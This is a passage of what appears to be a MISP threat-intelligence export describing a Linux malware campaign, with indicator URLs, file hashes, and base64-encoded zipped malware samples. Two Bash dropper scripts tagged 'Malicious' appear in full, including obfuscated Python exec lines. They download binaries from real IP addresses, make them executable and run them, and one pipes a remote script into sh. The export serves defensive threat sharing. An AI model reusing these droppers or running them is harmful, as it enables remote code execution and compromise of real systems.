"value": "#!/bin/sh\r\nif ! ps -ax | grep -v grep | grep \"[ ]\"$ >/dev/null; then\r\n\t nohup python -c 'import os,urllib; proxies = {\"http\": \"http://41.203.146.142:8080\"};f=open(\"/tmp/hsos\",\"wb\");f.write(urllib.urlopen(\"http://165.227.140.184/tmp/ofd\",proxies=proxies\r\n).read());f.close();os.system(\"chmod +x /tmp/hsos\");os.system(\"chmod 777 /tmp/hsos\");os.system(\"/tmp/hsos\")' &\r\n\t sleep 3\r\n\t nohup python3 -c 'import urllib.request; urllib.request.urlretrieve(\"http://165.227.140.184/tmp/ofd\", \"/tmp/vov\");os.system(\"chmod 7777 /tmp/vov\");os.system(\"chmod +x /tmp/vov\");os\r\n.system(\"/tmp/vov\")' 2>&1\r\n\t sleep 3\r\n\t nohup python -c 'exec(\"aW1wb3J0IG9zLHVybGxpYixiaW5hc2NpaTsgbD1iaW5hc2NpaS5iMmFfaGV4KG9zLnVyYW5kb20oNCkpOyBoZD11cmxsaWIudXJscmV0cmlldmUgKCJodHRwOi8vODcuMjM2LjIxMi4yMzcvdG1wL29mZCIsI\r\nCIvdG1wLyIrbCk7b3Muc3lzdGVtKCJjaG1vZCA3Nzc3IC90bXAvIitsKTtvcy5zeXN0ZW0oImNobW9kICt4IC90bXAvIitsKTsgb3Muc3lzdGVtKCIvdG1wLyIrbCk=\".decode(\"base64\"))' 2>&1\r\n\t sleep 3\r\n\t nohup python -c 'exec(\"aW1wb3J0IG9zLHVybGxpYixiaW5hc2NpaTtsPWJpbmFzY2lpLmIyYV9oZXgob3MudXJhbmRvbSg0KSk7aD1vcy5wYXRoLmV4cGFuZHVzZXIoIn4vIitsKTtwcm94aWVzPXsiaHR0cCI6Imh0dHA6Ly8yMTEuM\r\njQuMTAzLjIyODo4MCJ9O2Y9b3BlbihoLCJ3YiIpO2Yud3JpdGUodXJsbGliLnVybG9wZW4oImh0dHA6Ly84Ny4yMzYuMjEyLjIzNy90bXAvb2ZkIixwcm94aWVzPXByb3hpZXMpLnJlYWQoKSk7Zi5jbG9zZSgpO29zLnN5c3RlbSgiY2htb2QgNzc3NyB\r\n7fSIuZm9ybWF0KGgpKTtvcy5zeXN0ZW0oImNobW9kICt4IHt9Ii5mb3JtYXQoaCkpOyBvcy5zeXN0ZW0oInt9ICYiLmZvcm1hdChoKSk=\".decode(\"base64\"))' 2>&1\r\n\t wget -O - http://185.165.169.6/jp/_j.sh|sh ; curl http://185.165.169.6/jp/_j.jpg|sh\r\nfi"
|
||
|
},
|
||
|
{
|
||
|
"category": "Other",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": true,
|
||
|
"object_relation": "language",
|
||
|
"timestamp": "1559377640",
|
||
|
"to_ids": false,
|
||
|
"type": "text",
|
||
|
"uuid": "5cf236e8-c8e0-4f09-a08f-4020950d210f",
|
||
|
"value": "Bash"
|
||
|
},
|
||
|
{
|
||
|
"category": "Other",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": true,
|
||
|
"object_relation": "state",
|
||
|
"timestamp": "1559377640",
|
||
|
"to_ids": false,
|
||
|
"type": "text",
|
||
|
"uuid": "5cf236e8-97dc-4950-8b7b-49eb950d210f",
|
||
|
"value": "Malicious"
|
||
|
}
|
||
|
]
|
||
|
},
|
||
|
{
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"description": "File object describing a file with meta-information",
|
||
|
"meta-category": "file",
|
||
|
"name": "file",
|
||
|
"template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215",
|
||
|
"template_version": "17",
|
||
|
"timestamp": "1559377687",
|
||
|
"uuid": "5cf23717-673c-48de-9834-476d950d210f",
|
||
|
"Attribute": [
|
||
|
{
|
||
|
"category": "Payload delivery",
|
||
|
"comment": "",
|
||
|
"data": "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
|
||
|
"deleted": false,
|
||
|
"disable_correlation": false,
|
||
|
"object_relation": "malware-sample",
|
||
|
"timestamp": "1559377687",
|
||
|
"to_ids": true,
|
||
|
"type": "malware-sample",
|
||
|
"uuid": "5cf23717-3760-4566-ac39-4171950d210f",
|
||
|
"value": "ofd|9f189f26da1206151ce39e5aab269ff6"
|
||
|
},
|
||
|
{
|
||
|
"category": "Payload delivery",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": false,
|
||
|
"object_relation": "filename",
|
||
|
"timestamp": "1559377687",
|
||
|
"to_ids": false,
|
||
|
"type": "filename",
|
||
|
"uuid": "5cf23717-1cc0-4498-b030-4dfe950d210f",
|
||
|
"value": "ofd"
|
||
|
},
|
||
|
{
|
||
|
"category": "Payload delivery",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": false,
|
||
|
"object_relation": "md5",
|
||
|
"timestamp": "1559377687",
|
||
|
"to_ids": true,
|
||
|
"type": "md5",
|
||
|
"uuid": "5cf23717-a51c-4984-946c-4e30950d210f",
|
||
|
"value": "9f189f26da1206151ce39e5aab269ff6"
|
||
|
},
|
||
|
{
|
||
|
"category": "Payload delivery",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": false,
|
||
|
"object_relation": "sha1",
|
||
|
"timestamp": "1559377687",
|
||
|
"to_ids": true,
|
||
|
"type": "sha1",
|
||
|
"uuid": "5cf23717-dacc-4ee2-a604-4202950d210f",
|
||
|
"value": "4ee5040af71f5fd8080f0f0bed2672bc1f68d1e1"
|
||
|
},
|
||
|
{
|
||
|
"category": "Payload delivery",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": false,
|
||
|
"object_relation": "sha256",
|
||
|
"timestamp": "1559377687",
|
||
|
"to_ids": true,
|
||
|
"type": "sha256",
|
||
|
"uuid": "5cf23717-a18c-4add-a8d3-4dcc950d210f",
|
||
|
"value": "1fc77ceb1ffad48a067c9c83bc1c5347e4b359b4520859b91fc14fedc29a8803"
|
||
|
},
|
||
|
{
|
||
|
"category": "Other",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": true,
|
||
|
"object_relation": "size-in-bytes",
|
||
|
"timestamp": "1559377687",
|
||
|
"to_ids": false,
|
||
|
"type": "size-in-bytes",
|
||
|
"uuid": "5cf23717-9e74-4830-9d52-495d950d210f",
|
||
|
"value": "56392"
|
||
|
}
|
||
|
]
|
||
|
},
|
||
|
{
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"description": "url object describes an url along with its normalized field (like extracted using faup parsing library) and its metadata.",
|
||
|
"meta-category": "network",
|
||
|
"name": "url",
|
||
|
"template_uuid": "60efb77b-40b5-4c46-871b-ed1ed999fce5",
|
||
|
"template_version": "7",
|
||
|
"timestamp": "1559377846",
|
||
|
"uuid": "5cf237b6-06bc-4e57-ad7e-31bb950d210f",
|
||
|
"Attribute": [
|
||
|
{
|
||
|
"category": "Network activity",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": false,
|
||
|
"object_relation": "url",
|
||
|
"timestamp": "1559377846",
|
||
|
"to_ids": true,
|
||
|
"type": "url",
|
||
|
"uuid": "5cf237b6-d330-432a-bb24-31bb950d210f",
|
||
|
"value": "http://87.236.212.237/tmp/ofd"
|
||
|
},
|
||
|
{
|
||
|
"category": "Network activity",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": false,
|
||
|
"object_relation": "host",
|
||
|
"timestamp": "1559377846",
|
||
|
"to_ids": true,
|
||
|
"type": "hostname",
|
||
|
"uuid": "5cf237b6-9eb0-41b0-8815-31bb950d210f",
|
||
|
"value": "87.236.212.237"
|
||
|
},
|
||
|
{
|
||
|
"category": "Other",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": true,
|
||
|
"object_relation": "scheme",
|
||
|
"timestamp": "1559377846",
|
||
|
"to_ids": false,
|
||
|
"type": "text",
|
||
|
"uuid": "5cf237b6-fb28-44f8-94df-31bb950d210f",
|
||
|
"value": "http"
|
||
|
},
|
||
|
{
|
||
|
"category": "Other",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": false,
|
||
|
"object_relation": "resource_path",
|
||
|
"timestamp": "1559377846",
|
||
|
"to_ids": false,
|
||
|
"type": "text",
|
||
|
"uuid": "5cf237b6-37e8-4ebc-96ee-31bb950d210f",
|
||
|
"value": "/tmp/ofd"
|
||
|
}
|
||
|
]
|
||
|
},
|
||
|
{
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"description": "Object describing a computer program written to be run in a special run-time environment. The script or shell script can be used for malicious activities but also as support tools for threat analysts.",
|
||
|
"meta-category": "misc",
|
||
|
"name": "script",
|
||
|
"template_uuid": "6bce7d01-dbec-4054-b3c2-3655a19382e2",
|
||
|
"template_version": "4",
|
||
|
"timestamp": "1559378154",
|
||
|
"uuid": "5cf23812-2ae8-4feb-8e8b-4a1f950d210f",
|
||
|
"ObjectReference": [
|
||
|
{
|
||
|
"comment": "",
|
||
|
"object_uuid": "5cf23812-2ae8-4feb-8e8b-4a1f950d210f",
|
||
|
"referenced_uuid": "5cf238a2-0e5c-447e-a584-4072950d210f",
|
||
|
"relationship_type": "contains",
|
||
|
"timestamp": "1559378154",
|
||
|
"uuid": "5cf238ea-30d8-4cb2-8a6d-471e950d210f"
|
||
|
}
|
||
|
],
|
||
|
"Attribute": [
|
||
|
{
|
||
|
"category": "Other",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": false,
|
||
|
"object_relation": "script",
|
||
|
"timestamp": "1559377938",
|
||
|
"to_ids": false,
|
||
|
"type": "text",
|
||
|
"uuid": "5cf23812-c074-4095-9201-4ad5950d210f",
|
||
|
"value": "#!/bin/sh\r\nid1=\"fkbgh\"\r\nid2=\"jm\"\r\nif [ -x \"/tmp/\" ] && [ -w \"/tmp/\" ]; then\r\nwget -O /tmp/`echo $id1` http://185.165.169.6/jp/`echo $id2`\r\ncurl -o /tmp/`echo $id1` http://185.165.169.6/jp/`echo $id2`\r\nchmod +x /tmp/`echo $id1`\r\nchmod 7777 /tmp/`echo $id1`\r\n/tmp/`echo $id1` &\r\nelif [ -x \"/var/tmp/\" ] && [ -w \"/var/tmp/\" ]; then\r\nwget -O /var/tmp/`echo $id1` http://185.165.169.6/jp/`echo $id2`\r\ncurl -o /var/tmp/`echo $id1` http://185.165.169.6/jp/`echo $id2`\r\nchmod +x /var/tmp/`echo $id1`\r\nchmod 7777 /var/tmp/`echo $id1`\r\n/var/tmp/`echo $id1` &\r\nelif [ -x \"/dev/shm/\" ] && [ -w \"/dev/shm/\" ]; then\r\nwget -O /dev/shm/`echo $id1` http://185.165.169.6/jp/`echo $id2`\r\ncurl -o /dev/shm/`echo $id1` http://185.165.169.6/jp/`echo $id2`\r\nchmod +x /dev/shm/`echo $id1`\r\nchmod 7777 /dev/shm/`echo $id1`\r\n/dev/shm/`echo $id1` &\r\nelif [ -x $JBOSS_HOME ] && [ -w $JBOSS_HOME ]; then\r\nwget -O $JBOSS_HOME/`echo $id1` http://185.165.169.6/jp/`echo $id2`\r\ncurl -o $JBOSS_HOME/`echo $id1` http://185.165.169.6/jp/`echo $id2`\r\nchmod +x $JBOSS_HOME/`echo $id1`\r\nchmod 7777 $JBOSS_HOME/`echo $id1`\r\n$JBOSS_HOME/`echo $id1` &\r\nelif [ -x $HOME ] && [ -w $HOME ]; then\r\nwget -O $HOME/`echo $id1` http://185.165.169.6/jp/`echo $id2`\r\ncurl -o $HOME/`echo $id1` http://185.165.169.6/jp/`echo $id2`\r\nchmod +x $HOME/`echo $id1`\r\nchmod 7777 $HOME/`echo $id1`\r\n$HOME/`echo $id1` &\r\nelse\r\nwget -O `echo $id1` http://185.165.169.6/jp/`echo $id2`\r\ncurl -o `echo $id1` http://185.165.169.6/jp/`echo $id2`\r\nchmod +x `echo $id1`\r\nchmod 7777 `echo $id1`\r\n`echo $id1` &\r\nfi"
|
||
|
},
|
||
|
{
|
||
|
"category": "Other",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": true,
|
||
|
"object_relation": "language",
|
||
|
"timestamp": "1559377938",
|
||
|
"to_ids": false,
|
||
|
"type": "text",
|
||
|
"uuid": "5cf23812-7958-4746-90ff-4f07950d210f",
|
||
|
"value": "Bash"
|
||
|
},
|
||
|
{
|
||
|
"category": "Other",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": true,
|
||
|
"object_relation": "state",
|
||
|
"timestamp": "1559377938",
|
||
|
"to_ids": false,
|
||
|
"type": "text",
|
||
|
"uuid": "5cf23812-9244-4ac6-b02d-44ee950d210f",
|
||
|
"value": "Malicious"
|
||
|
}
|
||
|
]
|
||
|
},
|
||
|
{
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"description": "url object describes an url along with its normalized field (like extracted using faup parsing library) and its metadata.",
|
||
|
"meta-category": "network",
|
||
|
"name": "url",
|
||
|
"template_uuid": "60efb77b-40b5-4c46-871b-ed1ed999fce5",
|
||
|
"template_version": "7",
|
||
|
"timestamp": "1559378082",
|
||
|
"uuid": "5cf238a2-0e5c-447e-a584-4072950d210f",
|
||
|
"Attribute": [
|
||
|
{
|
||
|
"category": "Network activity",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": false,
|
||
|
"object_relation": "url",
|
||
|
"timestamp": "1559378082",
|
||
|
"to_ids": true,
|
||
|
"type": "url",
|
||
|
"uuid": "5cf238a2-48ac-4a0e-bd26-40a6950d210f",
|
||
|
"value": "http://185.165.169.6/jp/"
|
||
|
}
|
||
|
]
|
||
|
},
|
||
|
{
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"description": "url object describes an url along with its normalized field (like extracted using faup parsing library) and its metadata.",
|
||
|
"meta-category": "network",
|
||
|
"name": "url",
|
||
|
"template_uuid": "60efb77b-40b5-4c46-871b-ed1ed999fce5",
|
||
|
"template_version": "7",
|
||
|
"timestamp": "1559378300",
|
||
|
"uuid": "5cf2397c-b0a0-475d-b764-4c2a950d210f",
|
||
|
"Attribute": [
|
||
|
{
|
||
|
"category": "Network activity",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": false,
|
||
|
"object_relation": "url",
|
||
|
"timestamp": "1559378300",
|
||
|
"to_ids": true,
|
||
|
"type": "url",
|
||
|
"uuid": "5cf2397c-5e34-4a1d-8852-4c8b950d210f",
|
||
|
"value": "http://87.236.212.237/tmp/ofd"
|
||
|
},
|
||
|
{
|
||
|
"category": "Other",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": true,
|
||
|
"object_relation": "scheme",
|
||
|
"timestamp": "1559378300",
|
||
|
"to_ids": false,
|
||
|
"type": "text",
|
||
|
"uuid": "5cf2397c-3538-4d28-a44c-47b8950d210f",
|
||
|
"value": "http"
|
||
|
}
|
||
|
]
|
||
|
},
|
||
|
{
|
||
|
"comment": "Used as proxy",
|
||
|
"deleted": false,
|
||
|
"description": "url object describes an url along with its normalized field (like extracted using faup parsing library) and its metadata.",
|
||
|
"meta-category": "network",
|
||
|
"name": "url",
|
||
|
"template_uuid": "60efb77b-40b5-4c46-871b-ed1ed999fce5",
|
||
|
"template_version": "7",
|
||
|
"timestamp": "1559378481",
|
||
|
"uuid": "5cf23a31-1db8-4b41-81af-4416950d210f",
|
||
|
"Attribute": [
|
||
|
{
|
||
|
"category": "Network activity",
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"disable_correlation": false,
|
||
|
"object_relation": "url",
|
||
|
"timestamp": "1559378481",
|
||
|
"to_ids": true,
|
||
|
"type": "url",
|
||
|
"uuid": "5cf23a31-1560-497d-83a2-4da7950d210f",
|
||
|
"value": "http://41.203.146.142:8080"
|
||
|
}
|
||
|
]
|
||
|
},
|
||
|
{
|
||
|
"comment": "",
|
||
|
"deleted": false,
|
||
|
"description": "File object describing a file with meta-information",
|
||
|
"meta-category": "file",
|
||
|
"name": "file",
|
||
|
"template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215",
|
||
|
"template_version": "17",
|
||
|
"timestamp": "1559379790",
|
||
|
"uuid": "5cf23ef7-5138-4a1f-b773-4766950d210f",
|
||
|
"ObjectReference": [
|
||
|
{
|
||
|
"comment": "",
|
||
|
"object_uuid": "5cf23ef7-5138-4a1f-b773-4766950d210f",
|
||
|
"referenced_uuid": "5cf22fbc-cecc-465b-a261-4385950d210f",
|
||
|
"relationship_type": "related-to",
|
||
|
"timestamp": "1559379790",
|
||
|
"uuid": "5cf23f4e-8720-49cc-8c1e-4349950d210f"
|
||
|
}
|
||
|
],
|
||
|
"Attribute": [
|
||
|
{
|
||
|
"category": "Payload delivery",
|
||
|
"comment": "",
|
||
|
"data": "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